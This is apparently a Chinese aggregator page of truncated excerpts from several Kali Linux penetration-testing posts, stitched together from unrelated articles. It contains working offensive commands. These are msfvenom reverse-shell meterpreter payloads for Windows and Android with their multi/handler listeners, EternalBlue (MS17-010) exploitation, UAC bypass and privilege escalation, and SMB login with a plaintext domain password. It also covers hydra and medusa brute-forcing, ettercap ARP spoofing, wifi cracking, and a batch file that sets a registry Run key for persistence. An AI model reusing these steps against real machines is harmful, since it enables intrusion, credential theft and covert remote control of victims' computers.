Kali系列之multi/handler(渗透win7)】的更多相关文章

环境 靶机 192.168.137.133 kali 192.168.137.135 步骤+ 生成后门 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.135 LPORT=50000 -f exe -o openme.exe msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' lhost=192.168.137.…
 注:只是测试,不可干违法的事. 一.metaspolit工具的介绍 1.1.metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新.被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架. 1.2.Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性. 1.3.Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取…
已经获得目标操作系统控制权后扩大战果 提权 信息收集 渗透内网 永久后门 基于已有session扩大战果 绕过UAC限制 use exploit/windows/local/ask set session -id set filename use exploit/windows/local/bypassuac use exploit/windows/local/bypassuac_injection set session -id set payload 利用漏洞直接提权为systen use…
在无法通过网络边界的情况下转而攻击客户端----进行社会工程学攻击,进而渗透线上业务网络 含有漏洞利用代码的web站点--利用客户端漏洞 含有漏洞利用代码的doc,pdf等文档----诱使被害者执行payload 诱骗被害者执行payload(windows) msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -b "\x00" -e x86/shi…
在攻击服务器上生成连接软件,LHOST为攻击机IP地址 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台 将软件发给客户机上运行,此时kali上会有连接提示[mw_shl_code=applescript,true]root@qzwhost:~# msfconsole msfconsole > use exploit/multi/h…
原创 2017-05-31 玄魂工作室 玄魂工作室 打起精神,重新开启订阅号的原创文章写作工作,但是需要点时间,请耐心等待. 求资料的同学,没有及时回复的,请再次留言,我会尽快处理.今天分享两本电子书,虽然是英文的,但是难度不高. 第一本是基于Kali 2.0 的web渗透测试 链接: http://pan.baidu.com/s/1slLgAAD 密码: 8gvn 第二本是基于Hadoop的大数据取证技术 链接: http://pan.baidu.com/s/1qY37DMG 密码: 2cax…
渗透测试是利用已经发现的漏洞,采用恶意黑客的惯用手段来尝试对漏洞进行攻击. Kali Linux是BackTrack的进化版,是Linux的衍生版本,专门开发用作渗透测试,其中提供了很多的渗透测试工具. 结合白盒测试.黑盒测试.灰盒测试 Kali Linux测试一般步骤: 第一步,侦察 第二步,目录测试 第三步,漏洞利用 第四步,提升权限 第五步,保持访问 未完待续...…
kali linux安全渗透 网卡:rtl8187 工具aircrack-ng 操作+ 查看无线网卡信息 ifconfig 或者 iwconfig 有个是wlan0的就是您的外置无线网卡 启动网卡监听模式 airmon-ng start wlan0 监听成功后会网卡名字将变成wlan0mon 扫描附近wifi airodump-ng wlan0mon 参数详解: BSSID: MAC地址 PWR:信号强度,越小信号越强. #Data:传输的数据, 数据越大对我们越有利, 大的夸张的可能在看电影…
前言 上一篇文章中已获取了关于域的一些基本信息,在这里再整理一下,不知道信息收集的小伙伴可以看回上一篇文章哦 域:god.org 域控 windows server 2008:OWA,192.168.52.138 域主机 windows server 2003:ROOT-TVI862UBEH,192.168.52.141 win7内网ip:192.168.52.143 win7 username : Administrator domain : GOD password : hongrisec@…
MainActivity如下: package cc.c; import android.app.Activity; import android.os.Bundle; import android.os.Handler; import android.os.Looper; import android.os.Message; import android.widget.TextView; /** * Demo描述: * * 示例步骤如下: * 1 子线程给子线程本身发送消息 * 2 收到1的消…
MainActivity例如以下: package cc.c; import android.app.Activity; import android.os.Bundle; import android.os.Handler; import android.os.Looper; import android.os.Message; import android.widget.TextView; /** * Demo描写叙述: * * 演示样例过程例如以下: * 1 子线程给子线程本身发送消息 *…
本文已收录至:开源 DotNetty 实现的 Modbus TCP/IP 协议 DotNetty 作为一个半成品,我们不需要关注细节的实现,只需要关注自己的业务即可,所以最主要的就是处理 Codecs 和 Handler. 所有的 Codecs 和 Handler 均直接或间接继承自 ChannelHandlerAdapter.为什么要分为 Codecs 和 Handler,个人理解是 Codecs 负责将消息解码为我们所需的对象或者将处理的结果编码,Handler 对解码得到的对象进行逻辑处理…
install.bat @echo off if exist %windir%\notepad++.exe goto nt copy notepad++.exe %windir%\ copy x86_run.vbs %windir%\ :nt echo the notepad++ file is exist! echo; reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v notep…
环境 kali 192.168.137.131 靶机 192.168.137.133 语句 hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133 状态 root@kali:/home/chenglee# hydra -l root -P /home/chenglee/zidian/wordlist.TXT -t 6 ssh://192.168.137.133 Hydra v8.6 (c) 20…
ettercap在局域网中使用欺骗, 捕获对象浏览器中的图片. 环境 攻击方:kali linux, ip:192.168.137.129 目标方ip:192.168.137.130 路由器:192.168.137.1 条件:同一网段 步骤+ 在终端中启动ettercap ettercap -G 选择网卡接口 扫描活动主机 扫描中... 列出hosts 如下所示 目标与路由 现在列出了我的物理机也就是目标机和路由器的IP,然后选中需要欺骗的主机,再点Add to target 1,之后选中路由器…
正如前文“虚拟机下怎么连接U盘,如何使用U盘?一策书(湘岳阳万江波)的随笔”所言,我在win10下的虚拟机win7(i7 9700),而且听说了是不支持Win7的,其原因是不支持USB的驱动问题. 我在添加USB控制器是,说已存在,并已经达到极限值.双击“USB控制器”,原来设置有些问题: 1.USB兼容性,没有选择为“USB 3.0" 2."显示所有USB输入设备(S)”是灰色的,不能勾选 3.下面提示要安装额外的USB 3.0驱动,是在虚拟机Win7下安装. 情况如下图: 在win…
hydra hydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137.133 mysql 贴上小菜的爱的 Medusa medusa -h 192.168.137.133 -u root -P /home/chenglee/zidian/wordlist.TXT -M mysql 贴上SiecTem的…
下载Pastezort git clone https://github.com/ZettaHack/PasteZort.git 给Pastezort文件夹提升权限 /root/PasteZort/ ./PasteZort 运行 选择目标机,这里选择Windows 选择收听的payload 随后填上你要监听的ip和端口 这里填上网页上要显示的字符 这里蛊惑一下,写个cmd的命令 上面那个网页就是你的payload地址 下面这个问你是否开启msf监听 选择Y 再去访问http://192.168.…
前言 记一次log4j2打入内网并用CVE-2021-42287.CVE-2021-42278获取到DC权限的靶场渗透. 外网打点 首先对web进行端口扫描,发现38080端口和22端口 访问一下38080端口发现是一个error page 用Wappalyzer看一下是什么架构,但是好像没有检测出来 拿着报错去百度上发现应该是springboot 索性用goby再去扫一下,应该是spring没错,但是没有漏洞是什么操作?联想到最近出的log4j2的洞,可能他只是一个日志文件所以并没有框架 使用…
kali msfvenom生成木马 转:https://blog.csdn.net/qq_33391644/article/details/79266724 msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 1.让我们正式开始吧,因为我的目标平台是一个win7 64 位,所以要找一个相应的载荷. root@kali:~# msfvenom -l | grep windows | grep x64 | grep…
信息收集 信息收集 域控制器的相关信息: 通过arp扫描发现域控制器的ip地址为:192.168.52.138,尝试使用msf的smb_login模块登录smb是否成功 1 search smb_login 2 use 0 3 set rhosts 192.168.52.138 4 set smbpass hongrisec@2022 5 set smbuser Administrator 6 set smbdomain GOD 7 run 用户名.密码.domain我在前面一篇文章中已经获取到…
渗透之meterpreter 模拟场景:小明是我室友,整天游戏人生,浑浑噩噩,前途迷茫,每次上课交作业都要看我的,于是我开启了apche服务器,给他下载作业(别问我为什么不用QQ传,因为要装逼!),他无意中看到我的一些其他软件,并也一起打包下载了,并且运行了一个*.exe程序,嘿嘿,从此他的电脑上便再无秘密可言. 0x1.实验环境 VMware kali(linux)系统 kali ip:192.168.127.128 windows 7专业版 kali镜像官方下载地址->>https://w…
前言 靶机下载地址:ATT&CK 拓扑图: 通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环.虚拟机默认密码为hongrisec@2019. 环境搭建 名字 host password 说明 win7 192.168.200.129/24192.168.52.143/24 hongrisec@2019 web服务器 win2K3 192.168.52.141/24 hongrisec@2019 域成员 windows server 2008 r2 192…
kali渗透安卓手机 1.生成木马文件 msfvenom -p android/meterpreter/reverse_tcp LHOST=ip LPORT=端口 R > test.apk 在终端输入ifconfig查看本机ip地址 开启apache服务service apache2 start 将文件放在服务器cp test.apk /var/www/html 查看服务器目录文件ls /var/www/html 可以看到已经在服务器下生成了test.apk文件 2.开启监听 输入msfcons…
kali实战笔记 17:55 2016/7/19 by: _Silvers kali系统安装后的配置及美化安装vmwareToolstar zxvf VMwareTools-sfsfsfasfasfsaf #解压安装包cd 到解压后的安装目录 ./ 绿色的可执行文件 #进行安装# 等待安装结束,期间根据提示进行y/n确定reboot # 重启kalikali系统更新及替换国内软件源leafpad /etc/apt/sources.list注释掉官方的更新源复制国内的更新源 #可百度国内更新源地址…
文章来源i春秋 这只是一个演示我自己搭建的环境,但是成功率非常高的,对方可以是其系统,首先我开启kali在打开kali终端输入nmap –sP 192.168.1.1/24 这里的ip是我的网关地址你可以输入自己的网关地址(生活中网关就是路由器地址)这段语句是扫描局域网内存活的主机如图 更多我之前做过的案例https://bbs.ichunqiu.com/thread-23056-1-1.html<ignore_js_op> 这个被框住的IP就是我的目标192.16它8.1.117接下来输入n…
1.1 Kali Linux简介 如果您之前使用过或者了解BackTrack系列Linux的话,那么我只需要简单的说,Kali是BackTrack的升级换代产品,从Kali开始,BackTrack将成为历史. 如果您没接触过BackTrack也没关系,我们从头开始了解Kali Linux. 按照官方网站的定义,Kali Linux是一个高级渗透测试和安全审计Linux发行版.作为使用者,我简单的把它理解为,一个特殊的Linux发行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计…
一.先用Router Scan 扫描 看清楚了网络拓扑结构. 二.使用MS17-010批量扫描工具 下载:ms17-010Scan.exe  (也可以用kali自带的nmap和ms17-10模块扫)  三.漏洞利用 kali 终端输入 msfconsolesearch ms17-010 要是搜不到,请更新你的msfuse exploit/windows/smb/ms17_010_eternalblueset RHOST 192.168.1.66 设置目标机ipset payload window…
Kali Linux 前身是著名渗透测试系统BackTrack ,是一个基于 Debian 的 Linux 发行版,包含很多安全和取证方面的相关工具. 本文假设你在新装好的kali linux环境下…命令之前的说明带#的,表示需要root权限执行,带$的,表示普通用户权限. #安装好Kali后为系统添加一个新用户,建议设置密码和root的一样,以后默认都用这个用户登录系统,需要执行一次性的高权限命令时用sudo,执行一系列高权限命令时用su -. useradd -m -G video,audi…
目录 2.1 DNS信息收集1 2.1.1 whois查询3 2.1.2 域名基本信息查询4 Dns服务器查询4 a记录查询4 mx记录查询5 2.1.3 域名枚举5 fierse 5 dnsdict6 6 2.1.4 反向地址解析7 2.1.5 关于DNS区域传送漏洞8 小结11 2.1 DNS信息收集 从本节开始,我们从头开始,系统的学习基于Kali Linux的web应用渗透测试. 本章主要目标是从各个角度搜集测试目标的基本信息,包括搜集信息的途径.各种工具的使用方法,以及简单的示例. 按…